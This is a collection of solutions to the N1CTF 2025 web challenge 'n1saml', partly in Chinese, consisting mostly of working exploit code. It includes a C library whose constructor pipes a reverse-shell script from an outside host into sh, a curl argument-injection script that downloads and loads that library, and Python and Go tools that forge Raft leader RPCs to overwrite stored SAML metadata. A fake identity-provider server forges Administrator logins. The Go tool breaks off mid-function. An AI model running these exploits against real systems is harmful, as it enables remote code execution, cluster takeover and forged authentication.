CURL RCE and kind off kvstore something challenge, i think its cloud SAML challenge
| Event Name | N1CTF 2025 |
| GitHub URL | https://github.com/Nu1LCTF/n1ctf-2025/tree/main/web |
| Challenge Name | n1saml |
Attachments
References
solution 1
n1saml:
curl命令行参数注入RCE之后不就随便打了,raft又没鉴权,伪造协议发包直接给metadata改了就能随便伪造用户了
curl RCE: 下载一个so,用engine参数加载就行,给内网端口映射出来方便后面打
#include <stdlib.h>
__attribute__((constructor))
static void rce_init(void) {
system("curl https://reverse-shell.sh/156.239.238.102:9999 | sh");
}import requests
target = 'http://60.205.163.215:15481'
url = f'{target}/healthcheck'
data = {
'--resolve': 'sp:9000:0.0.0.0',
'-o': '/dev/null',
'--next': '-s',
'--url': 'http://156.239.238.102:8000/evil.so',
'-s': '-o',
'/tmp/evil.so': '',
}
r = requests.post(url, json=data)
print(r.text)
data = {
'--engine': '/tmp/evil.so',
}
r = requests.post(url, json=data)
print(r.text)伪造leader节点给raft集群的每个节点发高权重的log写入rpc,实现metadata篡改
<EntityDescriptor xmlns="urn:oasis:names:tc:SAML:2.0:metadata" validUntil="2025-12-10T05:23:26.991Z" cacheDuration="PT48H" entityID="https://idp.loums.cc/metadata">
<IDPSSODescriptor xmlns="urn:oasis:names:tc:SAML:2.0:metadata" protocolSupportEnumeration="urn:oasis:names:tc:SAML:2.0:protocol">
<KeyDescriptor use="signing">
<KeyInfo xmlns="http://www.w3.org/2000/09/xmldsig#">
<X509Data xmlns="http://www.w3.org/2000/09/xmldsig#">
<X509Certificate xmlns="http://www.w3.org/2000/09/xmldsig#">MIIDBTCCAe2gAwIBAgIUbInAECRGfm3CJpJXsM1coF2apiowDQYJKoZIhvcNAQELBQAwEjEQMA4GA1UEAwwHRmFrZUlkUDAeFw0yNTExMDEyMzQxMzVaFw0yNjExMDEyMzQxMzVaMBIxEDAOBgNVBAMMB0Zha2VJZFAwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQCrwswwXjPhkYnct983x4TGTSsl21I+cZ0KzL6Tjyrw66GSTNdXu8DXAl9ARBtCphGJLpns8cYAAEtcXT3gAbLjUgpc5Sfd6+S1NaFllGYfeN5bGwwx84NB772C5CbcM9GSm/2RWHsnMt7oCE2PJKijLQbIFiFQ3TdkumUo3I56AcaAEbJeX5mObcA4enhk4JtqBcJSIlfZzRbtI8VmwZSQdThsHu1riQ1qC+4M8u5u8/NC2AG1SjmKgIKpdJNtrYWjpQUkFja99AjU0Dz5SKmXwR/FCBsMdb/RMQgGsYeaFo+nO+FhzeHbTeHdDGL3LqJY99+FG648GoQ7ULcO1mz9AgMBAAGjUzBRMB0GA1UdDgQWBBTh3trctVjkNT/xNijOd9EP3Rl1XDAfBgNVHSMEGDAWgBTh3trctVjkNT/xNijOd9EP3Rl1XDAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBCwUAA4IBAQByA4MeIz+JSNR1usnUcKStqaKqUpeeuGA3T39ZqGyCInTG+yIJbuwy7ghwVdp1h4eVzpr3v7O+lVqE2kdW7O/aASz7BXTqPNDMCMm5r9vXTENN/ENxZWx3Osu14zhyYLP22zTytMt11641i5gh1NsKq/pop4Qnz4ULh+mb2yP3oWy//IarUQLIxTaxZYBYWx3qSGxvqcyuBEvfmuGX77ju3yZpakNRz/1zvD/sbNeQYnf8zOwgqMNP9Es7+F0SuKzMDXpSTXN3wHg3RED5PdUYuGMRVL7DpYTGlICJfNpiB+TCzKwkDINHOBJ7Q7L/YUOPLVwh+MmOKFcGQn9NyTr5</X509Certificate>
</X509Data>
</KeyInfo>
</KeyDescriptor>
<KeyDescriptor use="encryption">
<KeyInfo xmlns="http://www.w3.org/2000/09/xmldsig#">
<X509Data xmlns="http://www.w3.org/2000/09/xmldsig#">
<X509Certificate xmlns="http://www.w3.org/2000/09/xmldsig#">MIIDBTCCAe2gAwIBAgIUbInAECRGfm3CJpJXsM1coF2apiowDQYJKoZIhvcNAQELBQAwEjEQMA4GA1UEAwwHRmFrZUlkUDAeFw0yNTExMDEyMzQxMzVaFw0yNjExMDEyMzQxMzVaMBIxEDAOBgNVBAMMB0Zha2VJZFAwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQCrwswwXjPhkYnct983x4TGTSsl21I+cZ0KzL6Tjyrw66GSTNdXu8DXAl9ARBtCphGJLpns8cYAAEtcXT3gAbLjUgpc5Sfd6+S1NaFllGYfeN5bGwwx84NB772C5CbcM9GSm/2RWHsnMt7oCE2PJKijLQbIFiFQ3TdkumUo3I56AcaAEbJeX5mObcA4enhk4JtqBcJSIlfZzRbtI8VmwZSQdThsHu1riQ1qC+4M8u5u8/NC2AG1SjmKgIKpdJNtrYWjpQUkFja99AjU0Dz5SKmXwR/FCBsMdb/RMQgGsYeaFo+nO+FhzeHbTeHdDGL3LqJY99+FG648GoQ7ULcO1mz9AgMBAAGjUzBRMB0GA1UdDgQWBBTh3trctVjkNT/xNijOd9EP3Rl1XDAfBgNVHSMEGDAWgBTh3trctVjkNT/xNijOd9EP3Rl1XDAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBCwUAA4IBAQByA4MeIz+JSNR1usnUcKStqaKqUpeeuGA3T39ZqGyCInTG+yIJbuwy7ghwVdp1h4eVzpr3v7O+lVqE2kdW7O/aASz7BXTqPNDMCMm5r9vXTENN/ENxZWx3Osu14zhyYLP22zTytMt11641i5gh1NsKq/pop4Qnz4ULh+mb2yP3oWy//IarUQLIxTaxZYBYWx3qSGxvqcyuBEvfmuGX77ju3yZpakNRz/1zvD/sbNeQYnf8zOwgqMNP9Es7+F0SuKzMDXpSTXN3wHg3RED5PdUYuGMRVL7DpYTGlICJfNpiB+TCzKwkDINHOBJ7Q7L/YUOPLVwh+MmOKFcGQn9NyTr5</X509Certificate>
</X509Data>
</KeyInfo>
<EncryptionMethod Algorithm="http://www.w3.org/2001/04/xmlenc#aes128-cbc"></EncryptionMethod>
<EncryptionMethod Algorithm="http://www.w3.org/2001/04/xmlenc#aes192-cbc"></EncryptionMethod>
<EncryptionMethod Algorithm="http://www.w3.org/2001/04/xmlenc#aes256-cbc"></EncryptionMethod>
<EncryptionMethod Algorithm="http://www.w3.org/2001/04/xmlenc#rsa-oaep-mgf1p"></EncryptionMethod>
</KeyDescriptor>
<NameIDFormat>urn:oasis:names:tc:SAML:2.0:nameid-format:transient</NameIDFormat>
<SingleSignOnService Binding="urn:oasis:names:tc:SAML:2.0:bindings:HTTP-Redirect" Location="http://202.112.47.65:59991/sso"></SingleSignOnService>
<SingleSignOnService Binding="urn:oasis:names:tc:SAML:2.0:bindings:HTTP-POST" Location="http://202.112.47.65:59991/sso"></SingleSignOnService>
</IDPSSODescriptor>
</EntityDescriptor>import json
import socket
from typing import Optional, Tuple
import base64
import msgpack
RPC_APPEND_ENTRIES = 0x00
DEFAULT_PROTOCOL_VERSION = 3
LOG_TYPE_COMMAND = 0
def build_command(key: str, value: str) -> bytes:
payload = {"op": "set", "key": key, "value": value}
return json.dumps(payload, separators=(",", ":")).encode()
def make_entry(index: int, term: int, command_blob: bytes):
return {
"Index": index,
"Term": term,
"Type": LOG_TYPE_COMMAND,
"Data": command_blob,
"Extensions": None,
}
def craft_append_entries(term: int,
prev_index: int,
prev_term: int,
commit_index: int,
entry_index: Optional[int],
fake_id: str,
fake_addr: str,
command_blob: Optional[bytes]):
entries = []
if command_blob is not None and entry_index is not None:
entries.append(make_entry(entry_index, term, command_blob))
request = {
"ProtocolVersion": DEFAULT_PROTOCOL_VERSION,
"Term": term,
"LeaderCommitIndex": commit_index,
"PrevLogEntry": prev_index,
"PrevLogTerm": prev_term,
"Entries": entries,
"ID": fake_id.encode(),
"Addr": fake_addr.encode(),
"Leader": fake_addr.encode(),
}
packed = msgpack.packb(request, use_bin_type=True)
return bytes([RPC_APPEND_ENTRIES]) + packed
def _decode_msgpack_objects(unpacker: msgpack.Unpacker, required: int) -> list:
objects = []
for obj in unpacker:
objects.append(obj)
if len(objects) >= required:
break
return objects
def send_rpc(host: str, port: int, payload: bytes) -> Tuple[str, dict]:
with socket.create_connection((host, port), timeout=3) as sock:
sock.sendall(payload)
sock.shutdown(socket.SHUT_WR)
sock.settimeout(3)
unpacker = msgpack.Unpacker(raw=False)
objects = []
try:
while len(objects) < 2:
chunk = sock.recv(4096)
if not chunk:
break
unpacker.feed(chunk)
objects.extend(_decode_msgpack_objects(unpacker, 2 - len(objects)))
except socket.timeout as exc:
raise RuntimeError(f"raft RPC read timed out from {host}:{port}") from exc
if len(objects) < 2:
raise RuntimeError(f"incomplete RPC response from {host}:{port}: {objects!r}")
rpc_error = objects[0]
if isinstance(rpc_error, bytes):
rpc_error = rpc_error.decode(errors="replace")
response = objects[1]
return rpc_error, response
def probe_node(host: str, port: int, fake_id: str, fake_addr: str) -> Tuple[int, int]:
probe_payload = craft_append_entries(
term=0,
prev_index=0,
prev_term=0,
commit_index=0,
entry_index=None,
fake_id=fake_id,
fake_addr=fake_addr,
command_blob=None,
)
rpc_error, response = send_rpc(host, port, probe_payload)
if rpc_error:
raise RuntimeError(f"probe failed on {host}:{port} -> {rpc_error}")
term = response.get("Term", 0)
last_log = response.get("LastLog", 0)
if term == 0:
term = 1 # fall back to non-zero term for the next append
return term, last_log
def exploit_node(host: str,
port: int,
fake_id: str,
fake_addr: str,
key: str,
value: str):
term, last_log = probe_node(host, port, fake_id, fake_addr)
print(term, last_log)
entry_index = last_log + 1
command_blob = build_command(key, value)
payload = craft_append_entries(
term=term+1,
prev_index=0,
prev_term=0,
commit_index=entry_index,
entry_index=entry_index,
fake_id=fake_id,
fake_addr=fake_addr,
command_blob=command_blob,
)
rpc_error, response = send_rpc(host, port, payload)
return term, entry_index, rpc_error, response
def parse_target(target: str) -> Tuple[str, int]:
host, port = target.rsplit(":", 1)
return host, int(port)
# ---------------- exploit configuration ----------------
TARGETS = [
"156.239.238.102:12380",
"156.239.238.102:22380",
"156.239.238.102:32380",
]
FAKE_ID = "node3"
FAKE_ADDR = "0.0.0.0:32380"
KEY = "metadata"
VALUE = base64.b64encode(open('idp-metadata.xml', 'rb').read()).decode()
# -------------------------------------------------------
def run():
for target in TARGETS:
host, port = parse_target(target)
try:
term, entry_index, rpc_error, response = exploit_node(
host=host,
port=port,
fake_id=FAKE_ID,
fake_addr=FAKE_ADDR,
key=KEY,
value=VALUE,
)
print(f"[+] {target} term={term} entry={entry_index} rpc_error={rpc_error!r} response={response}")
except Exception as exc:
print(f"[-] {target} failed: {exc}")
if __name__ == "__main__":
run()
vibe code一个fake idp server伪造登录信息
#!/usr/bin/env python3
"""Minimal SAML IdP emulator driven by idp-metadata.xml."""
import argparse
import base64
import datetime as dt
import html
import logging
import textwrap
import uuid
import zlib
from http import HTTPStatus
from http.server import BaseHTTPRequestHandler, HTTPServer
from pathlib import Path
from typing import Optional
from urllib.parse import parse_qs, urlparse
try:
from lxml import etree
from signxml import XMLSigner, methods
except ImportError as exc:
raise SystemExit(
"Required packages missing. Install dependencies with "
"`python3 -m pip install lxml signxml`."
) from exc
NS = {
"md": "urn:oasis:names:tc:SAML:2.0:metadata",
"ds": "http://www.w3.org/2000/09/xmldsig#",
"samlp": "urn:oasis:names:tc:SAML:2.0:protocol",
"saml": "urn:oasis:names:tc:SAML:2.0:assertion",
}
class FakeIdentityProvider:
def __init__(self, metadata_path: Path, key_path: Path):
self.metadata_xml = metadata_path.read_bytes()
self.metadata_tree = etree.fromstring(self.metadata_xml)
self.entity_id = self.metadata_tree.get("entityID")
self.response_binding_path = self._resolve_sso_path()
self.cert_pem = self._read_cert_from_metadata()
self.private_key_pem = key_path.read_text()
def _resolve_sso_path(self) -> str:
sso = self.metadata_tree.find(".//md:SingleSignOnService", namespaces=NS)
if sso is None:
raise ValueError("metadata has no SingleSignOnService")
location = urlparse(sso.get("Location", ""))
return location.path or "/sso"
def _read_cert_from_metadata(self) -> str:
cert_b64 = self.metadata_tree.findtext(
".//md:KeyDescriptor[@use='signing']/ds:KeyInfo/ds:X509Data/ds:X509Certificate",
namespaces=NS,
)
if not cert_b64:
raise ValueError("metadata has no signing certificate")
wrapped = "\n".join(textwrap.wrap(cert_b64.strip(), 64))
return f"-----BEGIN CERTIFICATE-----\n{wrapped}\n-----END CERTIFICATE-----\n"
@staticmethod
def _decode_saml_request(encoded: str) -> etree._Element:
raw = base64.b64decode(encoded)
try:
inflated = zlib.decompress(raw, -15)
except zlib.error:
inflated = raw
return etree.fromstring(inflated)
def build_response(
self,
saml_request_b64: str,
relay_state: Optional[str],
) -> tuple[str, str]:
authn_request = self._decode_saml_request(saml_request_b64)
print(etree.tostring(authn_request, pretty_print=True).decode())
acs_url = authn_request.get("AssertionConsumerServiceURL")
if not acs_url:
acs_url = authn_request.get("Destination")
if not acs_url:
raise ValueError("AuthnRequest missing AssertionConsumerServiceURL/Destination")
request_id = authn_request.get("ID")
audience = authn_request.findtext(".//saml:Issuer", namespaces=NS) or ""
nameid_format = "urn:oasis:names:tc:SAML:1.1:nameid-format:unspecified"
nameid_value = "Administrator"
nameid_policy = authn_request.find(".//samlp:NameIDPolicy", namespaces=NS)
if nameid_policy is not None:
requested_format = nameid_policy.get("Format")
if requested_format:
nameid_format = requested_format
if nameid_format == "urn:oasis:names:tc:SAML:2.0:nameid-format:transient":
nameid_value = f"_{uuid.uuid4()}"
now = dt.datetime.utcnow()
not_on_or_after = now + dt.timedelta(minutes=360)
response_id = f"_{uuid.uuid4()}"
assertion_id = f"_{uuid.uuid4()}"
response = etree.Element(
"{urn:oasis:names:tc:SAML:2.0:protocol}Response",
ID=response_id,
Version="2.0",
IssueInstant=now.strftime("%Y-%m-%dT%H:%M:%SZ"),
Destination=acs_url,
)
if request_id:
response.set("InResponseTo", request_id)
issuer = etree.SubElement(response, "{urn:oasis:names:tc:SAML:2.0:assertion}Issuer")
issuer.text = self.entity_id
status = etree.SubElement(response, "{urn:oasis:names:tc:SAML:2.0:protocol}Status")
etree.SubElement(
status,
"{urn:oasis:names:tc:SAML:2.0:protocol}StatusCode",
Value="urn:oasis:names:tc:SAML:2.0:status:Success",
)
assertion = etree.SubElement(
response,
"{urn:oasis:names:tc:SAML:2.0:assertion}Assertion",
ID=assertion_id,
IssueInstant=now.strftime("%Y-%m-%dT%H:%M:%SZ"),
Version="2.0",
)
assertion_issuer = etree.SubElement(
assertion, "{urn:oasis:names:tc:SAML:2.0:assertion}Issuer"
)
assertion_issuer.text = self.entity_id
subject = etree.SubElement(assertion, "{urn:oasis:names:tc:SAML:2.0:assertion}Subject")
name_id = etree.SubElement(
subject,
"{urn:oasis:names:tc:SAML:2.0:assertion}NameID",
Format=nameid_format,
)
name_id.text = nameid_value
confirmation = etree.SubElement(
subject,
"{urn:oasis:names:tc:SAML:2.0:assertion}SubjectConfirmation",
Method="urn:oasis:names:tc:SAML:2.0:cm:bearer",
)
confirmation_data = etree.SubElement(
confirmation,
"{urn:oasis:names:tc:SAML:2.0:assertion}SubjectConfirmationData",
NotOnOrAfter=not_on_or_after.strftime("%Y-%m-%dT%H:%M:%SZ"),
Recipient=acs_url,
)
if request_id:
confirmation_data.set("InResponseTo", request_id)
conditions = etree.SubElement(
assertion,
"{urn:oasis:names:tc:SAML:2.0:assertion}Conditions",
NotBefore=(now - dt.timedelta(minutes=360)).strftime("%Y-%m-%dT%H:%M:%SZ"),
NotOnOrAfter=not_on_or_after.strftime("%Y-%m-%dT%H:%M:%SZ"),
)
if audience:
audience_restriction = etree.SubElement(
conditions, "{urn:oasis:names:tc:SAML:2.0:assertion}AudienceRestriction"
)
audience_el = etree.SubElement(
audience_restriction,
"{urn:oasis:names:tc:SAML:2.0:assertion}Audience",
)
audience_el.text = audience
authn_statement = etree.SubElement(
assertion,
"{urn:oasis:names:tc:SAML:2.0:assertion}AuthnStatement",
AuthnInstant=now.strftime("%Y-%m-%dT%H:%M:%SZ"),
SessionIndex=f"_{uuid.uuid4()}",
SessionNotOnOrAfter=not_on_or_after.strftime("%Y-%m-%dT%H:%M:%SZ"),
)
authn_context = etree.SubElement(
authn_statement, "{urn:oasis:names:tc:SAML:2.0:assertion}AuthnContext"
)
etree.SubElement(
authn_context,
"{urn:oasis:names:tc:SAML:2.0:assertion}AuthnContextClassRef",
).text = "urn:oasis:names:tc:SAML:2.0:ac:classes:PasswordProtectedTransport"
attribute_statement = etree.SubElement(
assertion, "{urn:oasis:names:tc:SAML:2.0:assertion}AttributeStatement"
)
for name, value in (("uid", "Administrator"), ("mail", "admin@nu1l.com")):
attribute = etree.SubElement(
attribute_statement,
"{urn:oasis:names:tc:SAML:2.0:assertion}Attribute",
Name=name,
)
attribute_value = etree.SubElement(
attribute,
"{urn:oasis:names:tc:SAML:2.0:assertion}AttributeValue",
)
attribute_value.text = value
signer = XMLSigner(
method=methods.enveloped,
signature_algorithm="rsa-sha256",
digest_algorithm="sha256",
)
signed = signer.sign(
response,
key=self.private_key_pem,
cert=self.cert_pem,
reference_uri=response_id,
)
signature = signed.find("{http://www.w3.org/2000/09/xmldsig#}Signature")
if signature is not None:
signed.remove(signature)
signed.insert(1, signature)
print('---')
print(etree.tostring(signed, xml_declaration=False, encoding="utf-8").decode())
saml_response = base64.b64encode(
etree.tostring(signed, xml_declaration=False, encoding="utf-8")
).decode()
return saml_response, acs_url
def build_handler(idp: FakeIdentityProvider):
class Handler(BaseHTTPRequestHandler):
server_version = "FakeIdP/0.1"
def do_GET(self): # noqa: N802
parsed = urlparse(self.path)
if parsed.path == "/metadata":
self._serve_metadata()
return
if parsed.path == idp.response_binding_path:
params = parse_qs(parsed.query)
self._serve_sso(
saml_request=params.get("SAMLRequest", [""])[0],
relay_state=params.get("RelayState", [None])[0],
)
return
self.send_error(HTTPStatus.NOT_FOUND, "Not Found")
def do_POST(self): # noqa: N802
parsed = urlparse(self.path)
if parsed.path == idp.response_binding_path:
length = int(self.headers.get("Content-Length", "0"))
body = self.rfile.read(length).decode()
params = parse_qs(body)
self._serve_sso(
saml_request=params.get("SAMLRequest", [""])[0],
relay_state=params.get("RelayState", [None])[0],
)
return
self.send_error(HTTPStatus.NOT_FOUND, "Not Found")
def log_message(self, fmt: str, *args):
logging.info("%s - - %s", self.address_string(), fmt % args)
def _serve_metadata(self):
self.send_response(HTTPStatus.OK)
self.send_header("Content-Type", "application/samlmetadata+xml")
self.send_header("Content-Length", str(len(idp.metadata_xml)))
self.end_headers()
self.wfile.write(idp.metadata_xml)
def _serve_sso(self, saml_request: str, relay_state: Optional[str]):
if not saml_request:
self.send_error(HTTPStatus.BAD_REQUEST, "Missing SAMLRequest")
return
try:
saml_response, acs_url = idp.build_response(saml_request, relay_state)
except Exception as exc: # pylint: disable=broad-except
logging.exception("Failed to craft response: %s", exc)
self.send_error(HTTPStatus.INTERNAL_SERVER_ERROR, str(exc))
return
html_body = [
"<!DOCTYPE html>",
"<html>",
"<body onload=\"document.forms[0].submit()\">",
"<form method=\"post\" action=\"%s\">"
% html.escape("http://156.239.238.102:9000/saml/acs", quote=True),
"<input type=\"hidden\" name=\"SAMLResponse\" value=\"%s\"/>"
% html.escape(saml_response, quote=True),
]
if relay_state is not None:
html_body.append(
"<input type=\"hidden\" name=\"RelayState\" value=\"%s\"/>"
% html.escape(relay_state, quote=True)
)
html_body.extend(
[
"<noscript><p>JavaScript required. Submit the form manually.</p>"
"<button type=\"submit\">Continue</button></noscript>",
"</form>",
"</body>",
"</html>",
]
)
body = "\n".join(html_body).encode()
self.send_response(HTTPStatus.OK)
self.send_header("Content-Type", "text/html; charset=utf-8")
self.send_header("Content-Length", str(len(body)))
self.end_headers()
self.wfile.write(body)
return Handler
def parse_args() -> argparse.Namespace:
parser = argparse.ArgumentParser(description="Serve a fake SAML IdP.")
parser.add_argument("--metadata", default="idp-metadata.xml", type=Path)
parser.add_argument("--key", default="idp.key", type=Path)
parser.add_argument("--host", default="0.0.0.0")
parser.add_argument("--port", default=8001, type=int)
return parser.parse_args()
def main():
args = parse_args()
logging.basicConfig(level=logging.INFO, format="%(asctime)s %(message)s")
idp = FakeIdentityProvider(args.metadata, args.key)
handler = build_handler(idp)
with HTTPServer((args.host, args.port), handler) as server:
logging.info(
"Fake IdP ready at http://%s:%d%s (metadata: /metadata)",
args.host,
args.port,
idp.response_binding_path,
)
server.serve_forever()
if __name__ == "__main__":
main()
最后访问映射出来的 sp 服务 /whoami 拿flag
solution 2
https://github.com/Nu1LCTF/n1ctf-2025/tree/main/web/n1saml/exploit
N1SAML Exploit
Detailed writeup: https://exp10it.io/2025/11/breaking-raft-consensus-in-go-n1saml-writeup-for-n1ctf-2025/
on attacker's machine
# build kvstore
pushd kvstore
GOOS=linux GOARCH=amd64 go build -o kvstore main.go
mv kvstore ../kvstore_hijack_amd64
popd
# build idp
pushd idp
GOOS=linux GOARCH=amd64 go build -o idp main.go
mv idp ../idp_amd64
cp idp.key ../idp.key
cp idp.crt ../idp.crt
popd
# build evil.so
docker run -v `pwd`:/build -it --platform=linux/amd64 --rm debian:bookworm-slim bash -c "apt update && apt install -y gcc && cd /build && gcc -fPIC -shared -o evil.so evil.c"
# rename evil.so to index.html
mv evil.so index.html
# host web server
simplehttpserver -listen 0.0.0.0:5555
on victim's machine
HOST=$(hostname -i)
# download binaries
curl <http://VPS:5555/kvstore_hijack_amd64> -o kvstore_hijack
curl <http://VPS:5555/idp_amd64> -o idp
curl <http://VPS:5555/idp.key> -o idp.key
curl <http://VPS:5555/idp.crt> -o idp.crt
# start idp
./idp > idp.log 2>&1 &
# save idp-metadata.xml
curl <http://$HOST:9001/metadata> -o idp-metadata.xml
# start kvstore
./kvstore_hijack -id evil -haddr 0.0.0.0:2333 -raddr $HOST:4444 -paddrs node1:$HOST:12380,node2:$HOST:22380,node3:$HOST:32380,evil:$HOST:4444 > kvstore.log 2>&1 &
# check the result
curl <http://$HOST:2379/status>
curl <http://$HOST:2379/key/metadata> | base64 -d
curl <http://$HOST:9000/whoami> -v
solution 3
For SAML, I used curl sp --url <http://server> -o /tmp/payload --output /tmp/payload + curl sp --url telnet://raftnode --upload-file /tmp/payload -T /tmp/payload for SSRF, and use a large term to become the leader and change the metadata. I believe that I've managed to change the metadata at local, but I didn't have time to do the rest or verify it on remote. This is a vibe-coded script I used for local testing.
package main
import (
"bytes"
"encoding/json"
"fmt"
"io"
"log"
"net"
"net/http"
"os"
"sync"
"time"
"github.com/hashicorp/go-msgpack/v2/codec"
)
// Raft RPC types
const (
rpcAppendEntries uint8 = 0
rpcRequestVote uint8 = 1
)
// RPCHeader matches hashicorp/raft RPCHeader
type RPCHeader struct {
ProtocolVersion uint64
ID []byte
Addr []byte
}
// RequestVoteRequest matches hashicorp/raft
type RequestVoteRequest struct {
RPCHeader
Term uint64
Candidate []byte
LastLogIndex uint64
LastLogTerm uint64
LeadershipTransfer bool
}
// AppendEntriesRequest matches hashicorp/raft
type AppendEntriesRequest struct {
RPCHeader
Term uint64
Leader []byte
PrevLogEntry uint64
PrevLogTerm uint64
Entries []Log
LeaderCommitIndex uint64
}
// Log entry structure
type Log struct {
Index uint64
Term uint64
Type uint8
Data []byte
Extensions []byte
AppendedAt time.Time
}
// Command structure for kvstore
type Command struct {
Op string `json:"op"`
Key string `json:"key"`
Value string `json:"value"`
}
var msgpackHandle = &codec.MsgpackHandle{}
// HTTP server to host binary payloads
type PayloadServer struct {
payloads map[string][]byte
mu sync.Mutex
bindAddr string // Address to bind to (e.g., "0.0.0.0:1337")
advertiseAddr string // Address advertised to clients (e.g., "172.17.0.1:1337")
}
func NewPayloadServer(bindAddr, advertiseAddr string) *PayloadServer {
return &PayloadServer{
payloads: make(map[string][]byte),
bindAddr: bindAddr,
advertiseAddr: advertiseAddr,
}
}
func (ps *PayloadServer) AddPayload(name string, data []byte) {
ps.mu.Lock()
defer ps.mu.Unlock()
ps.payloads[name] = data
}
func (ps *PayloadServer) Start() error {
http.HandleFunc("/", func(w http.ResponseWriter, r *http.Request) {
path := r.URL.Path[1:] // Remove leading /
ps.mu.Lock()
data, ok := ps.payloads[path]
ps.mu.Unlock()
if !ok {
http.NotFound(w, r)
return
}
w.Header().Set("Content-Type", "application/octet-stream")
w.Write(data)
})
log.Printf("[*] Starting payload HTTP server on %s (advertised as %s)", ps.bindAddr, ps.advertiseAddr)
go http.ListenAndServe(ps.bindAddr, nil)
time.Sleep(100 * time.Millisecond) // Give server time to start
return nil
}
func (ps *PayloadServer) GetAdvertiseAddr() string {
return ps.advertiseAddr
}
func main() {
if len(os.Args) < 5 {
fmt.Println("Usage: curl_injection <healthcheck_url> <attacker_id> <attacker_addr> <payload_server_addr>")
fmt.Println("Example: curl_injection http://localhost:8080/healthcheck node1 172.18.0.2:12380 172.18.0.1:1337")
os.Exit(1)
}
healthcheckURL := os.Args[1]
attackerID := []byte(os.Args[2])
attackerAddr := []byte(os.Args[3])
payloadServerAddr := os.Args[4]
log.Println("[*] Starting Raft attack via curl command injection")
log.Printf("[*] Healthcheck URL: %s", healthcheckURL)
log.Printf("[*] Attacker Identity: ID=%s, Addr=%s", string(attackerID), string(attackerAddr))
log.Printf("[*] Payload server: %s", payloadServerAddr)
// Start HTTP server to host payloads
// Extract port from payloadServerAddr and bind to 0.0.0.0:<port>
_, port, err := net.SplitHostPort(payloadServerAddr)
if err != nil {
log.Fatalf("[-] Invalid payload server address: %v", err)
}
bindAddr := "0.0.0.0:" + port
payloadServer := NewPayloadServer(bindAddr, payloadServerAddr)
if err := payloadServer.Start(); err != nil {
log.Fatalf("[-] Failed to start payload server: %v", err)
}
// Prepare malicious metadata
maliciousMetadata := "HACKED_BY_ATTACKER_" + time.Now().Format(time.RFC3339)
log.Printf("[*] Malicious metadata: %s", maliciousMetadata)
attackTerm := uint64(1000)
raftPorts := []int{12380, 22380, 32380}
// Step 1: Send RequestVote to all nodes
log.Printf("[*] Sending RequestVote with Term=%d to all nodes...", attackTerm)
for i, port := range raftPorts {
// Build and host the payload
payload, err := buildRequestVotePayload(attackerID, attackerAddr, attackTerm)
if err != nil {
log.Printf("[-] Failed to build RequestVote payload: %v", err)
continue
}
payloadName := fmt.Sprintf("vote_%d", port)
payloadServer.AddPayload(payloadName, payload)
if err := sendPayloadViaCurl(healthcheckURL, payloadServer.GetAdvertiseAddr(), payloadName, "kvstore", port); err != nil {
log.Printf("[-] RequestVote to node %d failed: %v", i+1, err)
} else {
log.Printf("[+] RequestVote sent to node %d", i+1)
}
}
// Wait for election to process
time.Sleep(500 * time.Millisecond)
log.Println("[+] Election phase completed")
// Step 2: Send AppendEntries to all nodes
log.Println("[*] Sending malicious AppendEntries to all nodes...")
for i, port := range raftPorts {
// Build and host the payload
payload, err := buildAppendEntriesPayload(attackerID, attackerAddr, attackTerm, maliciousMetadata)
if err != nil {
log.Printf("[-] Failed to build AppendEntries payload: %v", err)
continue
}
payloadName := fmt.Sprintf("append_%d", port)
payloadServer.AddPayload(payloadName, payload)
if err := sendPayloadViaCurl(healthcheckURL, payloadServer.GetAdvertiseAddr(), payloadName, "kvstore", port); err != nil {
log.Printf("[-] AppendEntries to node %d failed: %v", i+1, err)
} else {
log.Printf("[+] AppendEntries sent to node %d", i+1)
}
}
log.Println("[+] Attack completed!")
log.Println("[*] Wait a few seconds, then check metadata via HTTP to verify success")
}
func buildRequestVotePayload(attackerID, attackerAddr []byte, term uint64) ([]byte, error) {
req := &RequestVoteRequest{
RPCHeader: RPCHeader{
ProtocolVersion: 3,
ID: attackerID,
Addr: attackerAddr,
},
Term: term,
Candidate: attackerAddr,
LastLogIndex: 3,
LastLogTerm: term,
LeadershipTransfer: false,
}
var buf bytes.Buffer
buf.WriteByte(rpcRequestVote) // RPC type byte
encoder := codec.NewEncoder(&buf, msgpackHandle)
if err := encoder.Encode(req); err != nil {
return nil, fmt.Errorf("encode failed: %v", err)
}
return buf.Bytes(), nil
}
func buildAppendEntriesPayload(attackerID, attackerAddr []byte, term uint64, maliciousValue string) ([]byte, error) {
cmd := Command{
Op: "set",
Key: "metadata",
Value: maliciousValue,
}
cmdData, err := json.Marshal(cmd)
if err != nil {
return nil, fmt.Errorf("marshal command failed: %v", err)
}
req := &AppendEntriesRequest{
RPCHeader: RPCHeader{
ProtocolVersion: 3,
ID: attackerID,
Addr: attackerAddr,
},
Term: term,
Leader: attackerAddr,
PrevLogEntry: 3,
PrevLogTerm: 2,
Entries: []Log{
{
Index: 4,
Term: term,
Type: 0,
Data: cmdData,
},
},
LeaderCommitIndex: 4,
}
var buf bytes.Buffer
buf.WriteByte(rpcAppendEntries) // RPC type byte
encoder := codec.NewEncoder(&buf, msgpackHandle)
if err := encoder.Encode(req); err != nil {
return nil, fmt.Errorf("encode failed: %v", err)
}
return buf.Bytes(), nil
}
// sendPayloadViaCurl downloads payload via HTTP, then uploads to target via telnet
func sendPayloadViaCurl(healthcheckURL, payloadServerAddr, payloadName, targetHost string, targetPort int) error {
// Step 1: Download payload to /tmp/payload
downloadURL := fmt.Sprintf("http://%s/%s", payloadServerAddr, payloadName)
tmpFile := fmt.Sprintf("/tmp/payload_%s", payloadName)
// Use ordered params to ensure --next comes first
downloadParams := [][]string{
{"-o", tmpFile},
{"--output", tmpFile},
{"--url", downloadURL},
}
if err := sendCurlInjection(healthcheckURL, downloadParams); err != nil {
return fmt.Errorf("download failed: %v", err)
}
// Small delay to ensure file is written
time.Sleep(100 * time.Millisecond)
// Step 2: Upload via telnet
telnetURL := fmt.Sprintf("telnet://%s:%d", targetHost, targetPort)
uploadParams := [][]string{
{"--upload-file", tmpFile},
{"-T", tmpFile},
{"--url", telnetURL},
{"-m", "1"},
}
return sendCurlInjection(healthcheckURL, uploadParams)
}
func sendCurlInjection(healthcheckURL string, params [][]string) error {
// Convert to map for JSON marshaling
paramsMap := make(map[string]string)
